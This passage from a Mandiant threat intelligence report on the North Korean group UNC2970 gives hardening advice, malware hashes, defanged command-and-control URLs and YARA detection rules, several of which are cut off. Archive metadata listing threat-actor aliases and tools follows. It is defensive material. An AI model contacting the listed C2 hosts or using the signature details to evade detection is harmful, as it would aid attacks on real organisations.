be leveraged to enhance Conditional Access\r\nPolicies by enforcing access controls based on user or sign-in risk. Additionally, Identity Protection risk data\r\nshould be exported to a Security Information and Event Management (SIEM) solution for further correlation and\r\nanalysis. Note: Azure Identity Protection requires an Azure AD Premium P2 License.\r\nMulti Admin Approval with Intune: To prevent unauthorized changes, organizations utilizing Intune should\r\nimplement the Multi Admin Approval feature. This feature enforces a multiple administrative approval process\r\nthat requires secondary admin approval before modifying or creating Script and App deployments. Note: As of\r\nFebruary 2023, Multi Admin Approval is in Public Preview and does not yet support request notifications.\r\nRequests will need to be manually communicated to expedite the approval workflow. Microsoft has more\r\ninformation regarding Multi Admin Approval.\r\nAdditional Security Controls\r\nBlock Office Macros: While Microsoft has changed the default behavior of Office applications to block macros\r\nfrom the internet, Mandiant still recommends Organizations proactively deploy policies to control and enforce the\r\nbehavior of office files containing macros. Microsoft has more information on using policies to manage how\r\nOffice handles macros.\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 26 of 33\n\nDisable Disk Image Auto-Mount: Mandiant has observed UNC2970 utilize trojanized ISO files containing\r\nmalicious payloads to bypass security controls and trick victims into executing malware. On Windows systems,\r\nthe option to mount an ISO by “right-clicking” the file then selecting “Mount” from the context menu can be\r\nremoved by deleting the registry keys associated with image file types (.iso, .img, .vhd, .vhdx). Deleting these\r\nregistry keys will also prevent a user from auto-mounting an image file by “double-clicking” the file.\r\nEnhance PowerShell Logging: Increase PowerShell logging to provide security engineers and investigators the\r\nvisibility needed to detect malicious activity and provide a historical record of how PowerShell was used on\r\nsystems. For additional details regarding enhancing PowerShell logging, please reference to the Mandiant blog\r\npost, “Greater Visibility Through PowerShell Logging”.\r\nIndicators of Compromise\r\nIOC Signature\r\ne97b13b7e91edeceeac876c3869cc4eb PLANKWALK\r\na9e30c16df400c3f24fc4e9d76db78ef PLANKWALK\r\nf910ffb063abe31e87982bad68fd0d87 PLANKWALK\r\n30358639af2ecc217bbc26008c5640a7 LIDSHIFT\r\n41dcd8db4371574453561251701107bc LIDSHOT\r\n866f9f205fa1d47af27173b5eb464363 TOUCHSHIFT\r\n8c597659ede15d97914cb27512a55fc7 TOUCHSHIFT\r\na2109276dc704dedf481a4f6c8914c6e TOUCHSHIFT\r\n3bf748baecfc24def6c0393bc2354771 TOUCHSHOT\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 27 of 33\n\n91b6d6efa5840d6c1f10a72c66e925ce TOUCHKEY\r\n300103aff7ab676a41e47ec3d615ba3f HOOKSHOT\r\n49425d6dedb5f88bddc053cc8fd5f0f4 TOUCHMOVE\r\nabd91676a814f4b50ec357ca1584567e SIDESHOW\r\n05b6f459be513bf6120e9b2b85f6c844 CLOUDBURST\r\nhxxp://webinternal.anyplex[.]com/images/query_image.jsp PLANKWALK C2\r\nhxxp://www.fainstec[.]com/assets/js/jquery/jquery.php PLANKWALK C2\r\nhxxps://ajayjangid[.]in/js/jquery/jquery.php PLANKWALK C2\r\nhxxps://sede.lamarinadevalencia[.]com/tablonEdictal/layout/contentLayout.jsp PLANKWALK C2\r\nhxxps://leadsblue[.]com/wp-content/wp-utility/index.php LIDSHOT C2\r\nhxxps://toptradenews[.]com/wp-content/themes/themes.php SIDESHOW C2\r\nhxxp://mantis.quick.net[.]pl/library/securimage/index.php SIDESHOW C2\r\nhxxp://www.keewoom.co[.]kr/prod_img/201409/prod.php SIDESHOW C2\r\nhxxp://abba-servicios[.]mx/wordpress/wp-content/themes/config.php SIDESHOW C2\r\nhxxp://www.ruscheltelefonia[.]com.br/public/php/index.php SIDESHOW C2\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 28 of 33\n\nhxxps://olidhealth[.]com/wp-includes/php-compat/compat.php CLOUDBURST C2\r\nhxxps://doug[.]org/wp-includes/admin.php CLOUDBURST C2\r\nhxxps://crickethighlights[.]today/wp-content/plugins/contact.php CLOUDBURST C2\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nA105-491 Command and Control - QUESTDOWN, Exfiltration, Variant #1\r\nA105-492 Command and Control - QUESTDOWN, Exfiltration, Variant #2\r\nA105-493 Command and Control - QUESTDOWN, Next Stage Download Attempt, Variant #1\r\nA105-494 Command and Control - QUESTDOWN, Status, Variant #1\r\nA105-507 Phishing Email - Malicious Attachment, PLANKWALK Downloader, Variant #1\r\nA105-508 Phishing Email - Malicious Attachment, QUESTDOWN Dropper, Variant #1\r\nA105-514 Protected Theater - QUESTDOWN, Execution, Variant #1\r\nS100-218 Malicious Activity Scenario - Campaign 22-046, QUESTDOWN Infection\r\nSignatures\r\nPLANKWALK\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 29 of 33\n\nrule M_Hunt_APT_PLANKWALK_Code_String {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects a format string containing code and token found in PLANKWALK\"\r\n strings:\r\n $hex = { 63 6F 64 65 [1-6] 3D 25 64 26 [1-6] 75 73 65 72 [1-6] 3D 25 73 26 [1-6] 74 6F 6B 65 }\r\n condition:\r\n (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and $hex\r\n}\r\nLIDSHIFT\r\nrule M_APT_Loader_Win_LIDSHIFT_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects LIDSHIFT implant\"\r\n strings:\r\n $anchor1 = \"%s:%s:%s\" ascii\r\n $encloop = { 83 ?? 3F 72 ?? EB ?? 8D ?? ?? B8 ?? 41 10 04 F7 ?? 8B ?? 2B ?? D1 ?? 03 ?? C1 ?? 05 6B ?\r\n condition:\r\n uint16(0) == 0x5a4d and all of them\r\n}\r\nLIDSHOT\r\nrule M_APT_Loader_Win_LIDSHOT_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects LIDSHOT implant\"\r\n strings:\r\n $code1 = { 4C 89 6D ?? 4C 89 6D ?? C7 45 ?? 01 23 45 67 C7 45 ?? 89 AB CD EF C7 45 ?? FE DC BA 98 C7 45\r\n $code2 = { B8 1F 85 EB 51 41 F7 E8 C1 FA 03 8B CA C1 E9 1F 03 D1 6B CA 19 }\r\n $code3 = { C7 45 ?? 30 6B 4C 6C 66 C7 45 ?? 55 00 }\r\n condition:\r\n uint16(0) == 0x5a4d and all of them\r\n}\r\nCLOUDBURST\r\nrule M_APT_Loader_Win_CLOUDBURST_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n strings:\r\n$anchor1 = \"Microsoft Enhanced Cryptographic Provider v1.0\" ascii wide\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 30 of 33\n\n$code1 = { 74 79 70 }\r\n$code2 = { 65 71 75 69 }\r\n$code3 = { 62 6F 78 69 }\r\n$code4 = { E8 ?? ?? ?? ?? FF C6 B8 99 99 99 99 F7 EE D1 FA 8B C2 C1 E8 1F 03 D0 8D 04 16 8D 34 90 85 F6 75\r\n$str1 = \"%s%X\"\r\n condition:\r\n uint16(0) == 0x5a4d and all of them\r\n}\r\nTOUCHSHIFT\r\nrule M_DropperMemonly_TOUCHSHIFT_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule for TOUCHSHIFT\"\r\n strings:\r\n $p00_0 = {0943??eb??ff43??b0??eb??e8[4]c700[4]e8[4]32c0}\r\n $p00_1 = {4c6305[4]ba[4]4c8b0d[4]488b0d[4]ff15[4]4c6305[4]ba[4]4c8b0d[4]488b0d}\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and\r\n (\r\n ($p00_0 in (70000..90000) and $p00_1 in (0..64000))\r\n )\r\n}\r\nSIDESHOW\r\nrule M_APT_Backdoor_Win_SIDESHOW_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects string deobfuscation function in SIDESHOW, may also detect other variants of\r\n strings:\r\n $code1 = { 41 0F B6 ?? 33 ?? 48 ?? ?? 0F 1F 80 00 00 00 00 3A ?? 74 ?? FF ?? 48 FF ?? 83 ?? 48 72 ??\r\n condition:\r\n uint16(0) == 0x5a4d and (all of them)\r\n}\r\nTOUCHKEY\r\nrule M_Hunting_TOUCHKEY {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule For TOUCHKEY\"\r\n strings:\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 31 of 33\n\n$a1 = \"Normal.dost\"\r\n $a2 = \"Normal.docb\"\r\n $c1 = \"[SELECT]\" ascii wide\r\n $c2 = \"[SLEEP]\" ascii wide\r\n $c3 = \"[LSHIFT]\" ascii wide\r\n $c4 = \"[RSHIFT]\" ascii wide\r\n $c5 = \"[ENTER]\" ascii wide\r\n $c6 = \"[SPACE]\" ascii wide\r\n condition:\r\n (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550\r\n and filesize \u003c 200KB and (5 of ($c*)) and $a1 and $a2\r\n}\r\nTOUCHSHOT\r\nrule M_Hunting_TOUCHSHOT {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule For TOUCHSHOT\"\r\n strings:\r\n $path = \"%s\\\\Microsoft\\\\Windows\\\\Themes\\\\\" wide\r\n $format = \"%04d%02d%02d-%02d%02d%02d\"\r\n $s1 = \"EnumDisplaySettingsExW\" ascii\r\n $s2 = \"GetSystemMetrics\" ascii\r\n $s3 = \"GetDC\" ascii\r\n $s5 = \"ReleaseDC\" ascii\r\n condition:\r\n (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550\r\n and filesize \u003c 200KB and (3 of ($s*)) and $path and $format\r\n}\r\nHOOKSHOT\r\nrule M_Hunting_HOOKSHOT {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule for HOOKSHOT\"\r\n strings:\r\n $p00_0 = {8bb1[4]408873??85f675??488b81[4]488b88[4]4885c974??e8}\r\n $p00_1 = {8bf3488bea85db0f84[4]4c8d2d[4]66904c8d4424??8bd6488bcd}\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and\r\n (\r\n ($p00_0 in (470000..490000) and $p00_1 in (360000..380000))\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 32 of 33\n\n)\r\n}\r\nAcknowledgements\r\nSpecial thanks to John Wolfram, Rich Reece, Colby Lahaie, Dan Kelly, Joe Pisano, Jeffery Johnson, Fred Plan,\r\nOmar ElAhdan, Renato Fontana, Daniel Kennedy, and all the members of Mandiant Intelligence and Consulting\r\nthat supported these investigations. We would also like to thank Lexie Aytes for creating Mandiant Security\r\nValidation (MSV) actions, as well as Michael Barnhart, Jake Nicastro, Geoff Ackerman, and Dan Perez for their\r\ntechnical review and feedback.\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nhttps://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970\r\nPage 33 of 33\n\n https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970 \nFigure 7: Creating a handle to the file or creating it\nFigure 8: Taking a screenshot \nTOUCHKEY \n Page 9 of 33", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "ETDA", "Malpedia" ], "references": [ "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970" ], "report_names": [ "lightshow-north-korea-unc2970" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "c1eadfd8-6e9c-4024-902d-555c9530fcea", "created_at": "2023-01-06T13:46:38.645834Z", "updated_at": "2026-04-10T02:00:03.04985Z", "deleted_at": null, "main_name": "TEMP.Hermit", "aliases": [], "source_name": "MISPGALAXY:TEMP.Hermit", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "7a2dd0e8-beea-415c-b90d-4df9da8358ae", "created_at": "2024-09-20T02:00:04.575485Z", "updated_at": "2026-04-10T02:00:03.695726Z", "deleted_at": null, "main_name": "UNC2970", "aliases": [], "source_name": "MISPGALAXY:UNC2970", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd", "created_at": "2022-10-25T16:07:23.766784Z", "updated_at": "2026-04-10T02:00:04.7432Z", "deleted_at": null, "main_name": "Bluenoroff", "aliases": [ "APT 38", "ATK 117", "Alluring Pisces", "Black Alicanto", "Bluenoroff", "CTG-6459", "Copernicium", "G0082", "Nickel Gladstone", "Sapphire Sleet", "Selective Pisces", "Stardust Chollima", "T-APT-15", "TA444", "TAG-71", "TEMP.Hermit" ], "source_name": "ETDA:Bluenoroff", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434939, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2a3132b356393fb5ac433f1b17f2d59aff8341d2.pdf", "text": "https://archive.orkl.eu/2a3132b356393fb5ac433f1b17f2d59aff8341d2.txt", "img": "https://archive.orkl.eu/2a3132b356393fb5ac433f1b17f2d59aff8341d2.jpg" } }